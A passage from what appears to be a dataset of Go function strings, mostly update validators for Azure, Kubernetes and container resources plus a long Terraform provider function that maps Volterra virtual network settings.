\"SubscriptionID\"),\n\t\told.Spec.SubscriptionID,\n\t\tm.Spec.SubscriptionID); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif err := webhookutils.ValidateImmutable(\n\t\tfield.NewPath(\"Spec\", \"ResourceGroupName\"),\n\t\told.Spec.ResourceGroupName,\n\t\tm.Spec.ResourceGroupName); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif err := webhookutils.ValidateImmutable(\n\t\tfield.NewPath(\"Spec\", \"NodeResourceGroupName\"),\n\t\told.Spec.NodeResourceGroupName,\n\t\tm.Spec.NodeResourceGroupName); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif err := webhookutils.ValidateImmutable(\n\t\tfield.NewPath(\"Spec\", \"Location\"),\n\t\told.Spec.Location,\n\t\tm.Spec.Location); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif err := webhookutils.ValidateImmutable(\n\t\tfield.NewPath(\"Spec\", \"SSHPublicKey\"),\n\t\told.Spec.SSHPublicKey,\n\t\tm.Spec.SSHPublicKey); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif err := webhookutils.ValidateImmutable(\n\t\tfield.NewPath(\"Spec\", \"DNSServiceIP\"),\n\t\told.Spec.DNSServiceIP,\n\t\tm.Spec.DNSServiceIP); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif err := webhookutils.ValidateImmutable(\n\t\tfield.NewPath(\"Spec\", \"NetworkPlugin\"),\n\t\told.Spec.NetworkPlugin,\n\t\tm.Spec.NetworkPlugin); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif err := webhookutils.ValidateImmutable(\n\t\tfield.NewPath(\"Spec\", \"NetworkPolicy\"),\n\t\told.Spec.NetworkPolicy,\n\t\tm.Spec.NetworkPolicy); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif err := webhookutils.ValidateImmutable(\n\t\tfield.NewPath(\"Spec\", \"LoadBalancerSKU\"),\n\t\told.Spec.LoadBalancerSKU,\n\t\tm.Spec.LoadBalancerSKU); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif err := webhookutils.ValidateImmutable(\n\t\tfield.NewPath(\"Spec\", \"AzureEnvironment\"),\n\t\told.Spec.AzureEnvironment,\n\t\tm.Spec.AzureEnvironment); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif old.Spec.AADProfile != nil {\n\t\tif m.Spec.AADProfile == nil {\n\t\t\tallErrs = append(allErrs,\n\t\t\t\tfield.Invalid(\n\t\t\t\t\tfield.NewPath(\"Spec\", \"AADProfile\"),\n\t\t\t\t\tm.Spec.AADProfile,\n\t\t\t\t\t\"field cannot be nil, cannot disable AADProfile\"))\n\t\t} else {\n\t\t\tif !m.Spec.AADProfile.Managed && old.Spec.AADProfile.Managed {\n\t\t\t\tallErrs = append(allErrs,\n\t\t\t\t\tfield.Invalid(\n\t\t\t\t\t\tfield.NewPath(\"Spec\", \"AADProfile.Managed\"),\n\t\t\t\t\t\tm.Spec.AADProfile.Managed,\n\t\t\t\t\t\t\"cannot set AADProfile.Managed to false\"))\n\t\t\t}\n\t\t\tif len(m.Spec.AADProfile.AdminGroupObjectIDs) == 0 {\n\t\t\t\tallErrs = append(allErrs,\n\t\t\t\t\tfield.Invalid(\n\t\t\t\t\t\tfield.NewPath(\"Spec\", \"AADProfile.AdminGroupObjectIDs\"),\n\t\t\t\t\t\tm.Spec.AADProfile.AdminGroupObjectIDs,\n\t\t\t\t\t\t\"length of AADProfile.AdminGroupObjectIDs cannot be zero\"))\n\t\t\t}\n\t\t}\n\t}\n\n\t// Consider removing this once moves out of preview\n\t// Updating outboundType after cluster creation (PREVIEW)\n\t// https://learn.microsoft.com/en-us/azure/aks/egress-outboundtype#updating-outboundtype-after-cluster-creation-preview\n\tif err := webhookutils.ValidateImmutable(\n\t\tfield.NewPath(\"Spec\", \"OutboundType\"),\n\t\told.Spec.OutboundType,\n\t\tm.Spec.OutboundType); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif errs := m.validateVirtualNetworkUpdate(old); len(errs) > 0 {\n\t\tallErrs = append(allErrs, errs...)\n\t}\n\n\tif errs := m.validateAPIServerAccessProfileUpdate(old); len(errs) > 0 {\n\t\tallErrs = append(allErrs, errs...)\n\t}\n\n\tif len(allErrs) == 0 {\n\t\treturn nil, m.Validate(mw.Client)\n\t}\n\n\treturn nil, apierrors.NewInvalid(GroupVersion.WithKind(\"AzureManagedControlPlane\").GroupKind(), m.Name, allErrs)\n}", "func (d *DefaultDriver) ValidateUpdateVolume(vol *Volume, params map[string]string) error {\n\treturn &errors.ErrNotSupported{\n\t\tType: \"Function\",\n\t\tOperation: \"ValidateUpdateVolume()\",\n\t}\n}", "func ValidateIngressUpdate(ingress, oldIngress *extensions.Ingress) field.ErrorList {\n\tallErrs := apivalidation.ValidateObjectMetaUpdate(&ingress.ObjectMeta, &oldIngress.ObjectMeta, field.NewPath(\"metadata\"))\n\tallErrs = append(allErrs, ValidateIngressSpec(&ingress.Spec, field.NewPath(\"spec\"))...)\n\treturn allErrs\n}", "func (r *Role) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (o *ContainerUpdateBody) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\t// validation for a type composition with models.Resources\n\tif err := o.Resources.Validate(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := o.validateRestartPolicy(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func resourceVolterraVirtualNetworkUpdate(d *schema.ResourceData, meta interface{}) error {\n\tclient := meta.(*APIClient)\n\n\tupdateMeta := &ves_io_schema.ObjectReplaceMetaType{}\n\tupdateSpec := &ves_io_schema_virtual_network.ReplaceSpecType{}\n\tupdateReq := &ves_io_schema_virtual_network.ReplaceRequest{\n\t\tMetadata: updateMeta,\n\t\tSpec: updateSpec,\n\t}\n\tif v, ok := d.GetOk(\"annotations\"); ok && !isIntfNil(v) {\n\n\t\tms := map[string]string{}\n\n\t\tfor k, v := range v.(map[string]interface{}) {\n\t\t\tval := v.(string)\n\t\t\tms[k] = val\n\t\t}\n\t\tupdateMeta.Annotations = ms\n\t}\n\n\tif v, ok := d.GetOk(\"description\"); ok && !isIntfNil(v) {\n\t\tupdateMeta.Description =\n\t\t\tv.(string)\n\t}\n\n\tif v, ok := d.GetOk(\"disable\"); ok && !isIntfNil(v) {\n\t\tupdateMeta.Disable =\n\t\t\tv.(bool)\n\t}\n\n\tif v, ok := d.GetOk(\"labels\"); ok && !isIntfNil(v) {\n\n\t\tms := map[string]string{}\n\n\t\tfor k, v := range v.(map[string]interface{}) {\n\t\t\tval := v.(string)\n\t\t\tms[k] = val\n\t\t}\n\t\tupdateMeta.Labels = ms\n\t}\n\n\tif v, ok := d.GetOk(\"name\"); ok && !isIntfNil(v) {\n\t\tupdateMeta.Name =\n\t\t\tv.(string)\n\t}\n\n\tif v, ok := d.GetOk(\"namespace\"); ok && !isIntfNil(v) {\n\t\tupdateMeta.Namespace =\n\t\t\tv.(string)\n\t}\n\n\tnetworkChoiceTypeFound := false\n\n\tif v, ok := d.GetOk(\"global_network\"); ok && !networkChoiceTypeFound {\n\n\t\tnetworkChoiceTypeFound = true\n\n\t\tif v.(bool) {\n\t\t\tnetworkChoiceInt := &ves_io_schema_virtual_network.ReplaceSpecType_GlobalNetwork{}\n\t\t\tnetworkChoiceInt.GlobalNetwork = &ves_io_schema.Empty{}\n\t\t\tupdateSpec.NetworkChoice = networkChoiceInt\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"legacy_type\"); ok && !networkChoiceTypeFound {\n\n\t\tnetworkChoiceTypeFound = true\n\t\tnetworkChoiceInt := &ves_io_schema_virtual_network.ReplaceSpecType_LegacyType{}\n\n\t\tupdateSpec.NetworkChoice = networkChoiceInt\n\n\t\tnetworkChoiceInt.LegacyType = ves_io_schema.VirtualNetworkType(ves_io_schema.VirtualNetworkType_value[v.(string)])\n\n\t}\n\n\tif v, ok := d.GetOk(\"private_network\"); ok && !networkChoiceTypeFound {\n\n\t\tnetworkChoiceTypeFound = true\n\n\t\tif v.(bool) {\n\t\t\tnetworkChoiceInt := &ves_io_schema_virtual_network.ReplaceSpecType_PrivateNetwork{}\n\t\t\tnetworkChoiceInt.PrivateNetwork = &ves_io_schema.Empty{}\n\t\t\tupdateSpec.NetworkChoice = networkChoiceInt\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"site_local_inside_network\"); ok && !networkChoiceTypeFound {\n\n\t\tnetworkChoiceTypeFound = true\n\n\t\tif v.(bool) {\n\t\t\tnetworkChoiceInt := &ves_io_schema_virtual_network.ReplaceSpecType_SiteLocalInsideNetwork{}\n\t\t\tnetworkChoiceInt.SiteLocalInsideNetwork = &ves_io_schema.Empty{}\n\t\t\tupdateSpec.NetworkChoice = networkChoiceInt\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"site_local_network\"); ok && !networkChoiceTypeFound {\n\n\t\tnetworkChoiceTypeFound = true\n\n\t\tif v.(bool) {\n\t\t\tnetworkChoiceInt := &ves_io_schema_virtual_network.ReplaceSpecType_SiteLocalNetwork{}\n\t\t\tnetworkChoiceInt.SiteLocalNetwork = &ves_io_schema.Empty{}\n\t\t\tupdateSpec.NetworkChoice = networkChoiceInt\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"srv6_network\"); ok && !networkChoiceTypeFound {\n\n\t\tnetworkChoiceTypeFound = true\n\t\tnetworkChoiceInt := &ves_io_schema_virtual_network.ReplaceSpecType_Srv6Network{}\n\t\tnetworkChoiceInt.Srv6Network = &ves_io_schema_virtual_network.PerSiteSrv6NetworkType{}\n\t\tupdateSpec.NetworkChoice = networkChoiceInt\n\n\t\tsl := v.(*schema.Set).List()\n\t\tfor _, set := range sl {\n\t\t\tcs := set.(map[string]interface{})\n\n\t\t\tif v, ok := cs[\"access_network_rtargets\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tsl := v.([]interface{})\n\t\t\t\taccessNetworkRtargets := make([]*ves_io_schema.RouteTarget, len(sl))\n\t\t\t\tnetworkChoiceInt.Srv6Network.AccessNetworkRtargets = accessNetworkRtargets\n\t\t\t\tfor i, set := range sl {\n\t\t\t\t\taccessNetworkRtargets[i] = &ves_io_schema.RouteTarget{}\n\t\t\t\t\taccessNetworkRtargetsMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\trtargetChoiceTypeFound := false\n\n\t\t\t\t\tif v, ok := accessNetworkRtargetsMapStrToI[\"asn2byte_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Asn2ByteRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget = &ves_io_schema.RouteTarget2ByteAsn{}\n\t\t\t\t\t\taccessNetworkRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"as_number\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget.AsNumber = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := accessNetworkRtargetsMapStrToI[\"asn4byte_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Asn4ByteRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget = &ves_io_schema.RouteTarget4ByteAsn{}\n\t\t\t\t\t\taccessNetworkRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"as_number\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget.AsNumber = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := accessNetworkRtargetsMapStrToI[\"ipv4_addr_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Ipv4AddrRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget = &ves_io_schema.RouteTargetIPv4Addr{}\n\t\t\t\t\t\taccessNetworkRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"address\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget.Address = v.(string)\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tdefaultVipChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"anycast_vip\"]; ok && !isIntfNil(v) && !defaultVipChoiceTypeFound {\n\n\t\t\t\tdefaultVipChoiceTypeFound = true\n\t\t\t\tdefaultVipChoiceInt := &ves_io_schema_virtual_network.PerSiteSrv6NetworkType_AnycastVip{}\n\n\t\t\t\tnetworkChoiceInt.Srv6Network.DefaultVipChoice = defaultVipChoiceInt\n\n\t\t\t\tdefaultVipChoiceInt.AnycastVip = v.(string)\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"fleet_vip\"]; ok && !isIntfNil(v) && !defaultVipChoiceTypeFound {\n\n\t\t\t\tdefaultVipChoiceTypeFound = true\n\t\t\t\tdefaultVipChoiceInt := &ves_io_schema_virtual_network.PerSiteSrv6NetworkType_FleetVip{}\n\t\t\t\tdefaultVipChoiceInt.FleetVip = &ves_io_schema_virtual_network.AnyCastVIPFleetType{}\n\t\t\t\tnetworkChoiceInt.Srv6Network.DefaultVipChoice = defaultVipChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"vip_allocator\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tvipAllocatorInt := &ves_io_schema_views.ObjectRefType{}\n\t\t\t\t\t\tdefaultVipChoiceInt.FleetVip.VipAllocator = vipAllocatorInt\n\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tvaMapToStrVal := set.(map[string]interface{})\n\t\t\t\t\t\t\tif val, ok := vaMapToStrVal[\"name\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\t\t\tvipAllocatorInt.Name = val.(string)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tif val, ok := vaMapToStrVal[\"namespace\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\t\t\tvipAllocatorInt.Namespace = val.(string)\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif val, ok := vaMapToStrVal[\"tenant\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\t\t\tvipAllocatorInt.Tenant = val.(string)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"interface_ip_vip\"]; ok && !isIntfNil(v) && !defaultVipChoiceTypeFound {\n\n\t\t\t\tdefaultVipChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tdefaultVipChoiceInt := &ves_io_schema_virtual_network.PerSiteSrv6NetworkType_InterfaceIpVip{}\n\t\t\t\t\tdefaultVipChoiceInt.InterfaceIpVip = &ves_io_schema.Empty{}\n\t\t\t\t\tnetworkChoiceInt.Srv6Network.DefaultVipChoice = defaultVipChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"enterprise_network_rtargets\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tsl := v.([]interface{})\n\t\t\t\tenterpriseNetworkRtargets := make([]*ves_io_schema.RouteTarget, len(sl))\n\t\t\t\tnetworkChoiceInt.Srv6Network.EnterpriseNetworkRtargets = enterpriseNetworkRtargets\n\t\t\t\tfor i, set := range sl {\n\t\t\t\t\tenterpriseNetworkRtargets[i] = &ves_io_schema.RouteTarget{}\n\t\t\t\t\tenterpriseNetworkRtargetsMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\trtargetChoiceTypeFound := false\n\n\t\t\t\t\tif v, ok := enterpriseNetworkRtargetsMapStrToI[\"asn2byte_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Asn2ByteRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget = &ves_io_schema.RouteTarget2ByteAsn{}\n\t\t\t\t\t\tenterpriseNetworkRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"as_number\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget.AsNumber = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := enterpriseNetworkRtargetsMapStrToI[\"asn4byte_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Asn4ByteRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget = &ves_io_schema.RouteTarget4ByteAsn{}\n\t\t\t\t\t\tenterpriseNetworkRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"as_number\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget.AsNumber = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := enterpriseNetworkRtargetsMapStrToI[\"ipv4_addr_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Ipv4AddrRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget = &ves_io_schema.RouteTargetIPv4Addr{}\n\t\t\t\t\t\tenterpriseNetworkRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"address\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget.Address = v.(string)\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"export_rtargets\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tsl := v.([]interface{})\n\t\t\t\texportRtargets := make([]*ves_io_schema.RouteTarget, len(sl))\n\t\t\t\tnetworkChoiceInt.Srv6Network.ExportRtargets = exportRtargets\n\t\t\t\tfor i, set := range sl {\n\t\t\t\t\texportRtargets[i] = &ves_io_schema.RouteTarget{}\n\t\t\t\t\texportRtargetsMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\trtargetChoiceTypeFound := false\n\n\t\t\t\t\tif v, ok := exportRtargetsMapStrToI[\"asn2byte_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Asn2ByteRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget = &ves_io_schema.RouteTarget2ByteAsn{}\n\t\t\t\t\t\texportRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"as_number\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget.AsNumber = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := exportRtargetsMapStrToI[\"asn4byte_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Asn4ByteRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget = &ves_io_schema.RouteTarget4ByteAsn{}\n\t\t\t\t\t\texportRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"as_number\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget.AsNumber = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := exportRtargetsMapStrToI[\"ipv4_addr_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Ipv4AddrRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget = &ves_io_schema.RouteTargetIPv4Addr{}\n\t\t\t\t\t\texportRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"address\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget.Address = v.(string)\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"fleets\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tsl := v.([]interface{})\n\t\t\t\tfleetsInt := make([]*ves_io_schema_views.ObjectRefType, len(sl))\n\t\t\t\tnetworkChoiceInt.Srv6Network.Fleets = fleetsInt\n\t\t\t\tfor i, ps := range sl {\n\n\t\t\t\t\tfMapToStrVal := ps.(map[string]interface{})\n\t\t\t\t\tfleetsInt[i] = &ves_io_schema_views.ObjectRefType{}\n\n\t\t\t\t\tif v, ok := fMapToStrVal[\"name\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\tfleetsInt[i].Name = v.(string)\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := fMapToStrVal[\"namespace\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\tfleetsInt[i].Namespace = v.(string)\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := fMapToStrVal[\"tenant\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\tfleetsInt[i].Tenant = v.(string)\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"internet_rtargets\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tsl := v.([]interface{})\n\t\t\t\tinternetRtargets := make([]*ves_io_schema.RouteTarget, len(sl))\n\t\t\t\tnetworkChoiceInt.Srv6Network.InternetRtargets = internetRtargets\n\t\t\t\tfor i, set := range sl {\n\t\t\t\t\tinternetRtargets[i] = &ves_io_schema.RouteTarget{}\n\t\t\t\t\tinternetRtargetsMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\trtargetChoiceTypeFound := false\n\n\t\t\t\t\tif v, ok := internetRtargetsMapStrToI[\"asn2byte_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Asn2ByteRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget = &ves_io_schema.RouteTarget2ByteAsn{}\n\t\t\t\t\t\tinternetRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"as_number\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget.AsNumber = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn2ByteRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := internetRtargetsMapStrToI[\"asn4byte_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Asn4ByteRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget = 